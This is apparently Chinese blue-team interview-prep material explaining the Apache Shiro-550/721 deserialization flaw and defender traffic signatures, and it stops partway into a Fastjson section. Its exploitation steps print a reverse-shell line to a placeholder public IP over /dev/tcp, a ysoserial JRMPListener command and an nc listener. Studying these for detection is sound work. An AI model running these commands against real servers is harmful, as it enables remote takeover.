2025护网蓝队面试题.docx

ApacheShiro漏洞（框架漏洞）

基本介绍：

ApacheShiro是一种功能强大且易于使用的Java安全框架，它执行身份验证、授权、加密和会话管理，可用于保护任何应用程序的安全。

Shiro提供了应用程序安全性API来执行以下方面：

1、Authentication（认证）：用户身份识别，通常被称为用户“登录”

2、Authorization（授权）：访问控制。比如某个用户是否具有某个操作的使用权限。

3、SessionManagement（会话管理）：特定于用户的会话管理,甚至在非web或EJB应用程序。

4、Cryptography（加密）：在对数据源使用加密算法加密的同时，保证易于使用。

上述四个方面也被称为应用程序安全性的四个基石

漏洞原理（Shiro-550）：

1、Shiro框架提供了记住密码的功能（RememberMe）

2、用户登录成功后的信息，会经过加密编码后存储在rememberMe的cookie值中

3、因为rememberMe的cookie值加密方法为AES对称加密算法。这导致只要知道了用的是什么密钥，就可以通过构造cookie值将恶意的序列化语句传给服务器，造成反序列化漏洞的利用。

4、由于Shiro-550漏洞的密钥就在软件的源代码里，并且Shiro计算出cookie的流程为：信息–序列化–AES加密–Base64编码–cookie

5、因此我们只要将信息改为我们想要服务器反序列化时执行的命令，那么就可以达到远程命令执行的目的了。

漏洞利用：

1、通过脚本或网站（Runtime.execPayloadGenerater|AresXsBlog()）对命令进行Base64编码（用于避免特殊字符报错和绕过检测）

基本的反弹shell命令：bash-i/dev/tcp/公网IP地址/端口01

2、利用ysoserial中的JRMP监听模块，监听目标服务器即将连接的端口，并在目标服务器连接时，将反弹shell命令递给目标服务器。

可用的ysoserial语句：java-cpysoserial.jarysoserial.exploit.JRMPListener监听端口CommonsCollections4Base64命令

3、利用脚本生成cookie。

shiro利用链不多，脚本都封装好了，用脚本很方便。（本人也还不会编写脚本，www…）

4、在公网服务器上别忘记打开nc监听获取shell

nc监听语句：nc-lvvp监听端口

5、利用Burpsuite抓包改好cookie中RememberMe参数后就可以发出然后坐等结果了。

Shiro-721与Shiro-550的不同：

1、Shiro-721采取系统随机生成的密钥进行加密，Shiro-550则是使用已知的固定密钥。

2、Shiro-721的利用需要攻击者首先先获取正确的RememberMeCookie作为前缀（即需要先获取一个合法账号登录），然后才可以通过构造RememberMeCookie的值来实现反序列化漏洞攻击。Shiro-550则可以直接构造cookie。

流量特征（Shiro-550）：

由于shiro的可利用链较少并且构造相对困难，因此一般攻击者都采取的工具进行利用测试。

所以我重点讲解使用工具进行探测时的流量特征

1、工具通常会在数据请求包中携带rememberMe=yes来探测shiro框架是否存在

存在则会在响应数据包中返回rememberMe=deleteMe

2、爆破密钥：短时大量请求（虽然一共也就没几个固定密钥），大部分都是rememberMe=deleteMe

当爆破成功时，则无rememberMe参数返回。

3、爆破利用链：rememberMe参数加密语句长度异常（因为构建利用链需要很长的语句）

当爆破成功时，则无rememberMe参数返回。

4、命令执行：大量的“$”符（工具用于定位返回值的）

5、上传内存马的流量特征：

5.1、POST请求（由于需要恶意文件）

5.2、请求包中包含密码特征及其路径

5.3、响应包中存在“Success”，“Filteralreadyexists”等特征

FastJson漏洞

基本介绍：

Fastjson是阿里巴巴公司开源的一款JSON解析器，它可以解析JSON格式的字符串，是一个Java库。

支持将JavaBean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。

支持将Java对象转换为JSON格式，也可以将JSON字符串转换为Java对象。

Fastjson的作用是用于对JSON格式的数据进行解析和打包

（所以出现Json格式的地方